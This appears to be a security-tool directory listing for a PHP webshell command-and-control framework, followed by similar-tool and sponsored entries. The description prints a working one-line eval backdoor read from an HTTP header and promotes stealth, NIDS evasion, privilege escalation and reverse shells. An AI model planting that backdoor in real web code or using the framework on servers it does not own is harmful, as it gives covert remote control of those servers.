Full-featured C2 framework which silently persists on webserver via polymorphic PHP oneliner. The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?> Efficient: More than 20 plugins to automate privilege-escalation tasks. Run commands and browse filesystem, bypassing PHP security restrictions. Upload/Download files between client and target. Edit remote files through local text editor. Run SQL console on target system. Spawn reverse TCP shells. Stealth: The framework is made by paranoids, for paranoids. Nearly invisible by log analysis and NIDS signature detection. Safe-mode and common PHP security restrictions bypass. Communications are hidden in HTTP Headers. Loaded payloads are obfuscated to bypass NIDS. http/https/socks4/socks5 Proxy support. Convenient: A robust interface with many crucial features. Detailed help for any optio
FEATURES
SIMILAR TOOLS
Emulate offensive attack techniques in the cloud with a self-contained Go binary.
A digital archive of the internet, allowing users to capture and browse archived web pages.
A comprehensive .NET post-exploitation library designed for advanced security testing.
Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ...
A domain reconnaissance tool that automates subdomain discovery, port scanning, and monitoring with support for multiple data sources and notification integrations.
Create a vulnerable active directory for testing various Active Directory attacks.
A proof-of-concept obfuscation toolkit for C# post-exploitation tools, designed to conceal malicious activities from detection.
PINNED

Mandos
Fractional CISO service that helps B2B companies implement security leadership to win enterprise deals, achieve compliance, and develop strategic security programs.

Checkmarx SCA
A software composition analysis tool that identifies vulnerabilities, malicious code, and license risks in open source dependencies throughout the software development lifecycle.

Orca Security
A cloud-native application protection platform that provides agentless security monitoring, vulnerability management, and compliance capabilities across multi-cloud environments.

DryRun
A GitHub application that performs automated security code reviews by analyzing contextual security aspects of code changes during pull requests.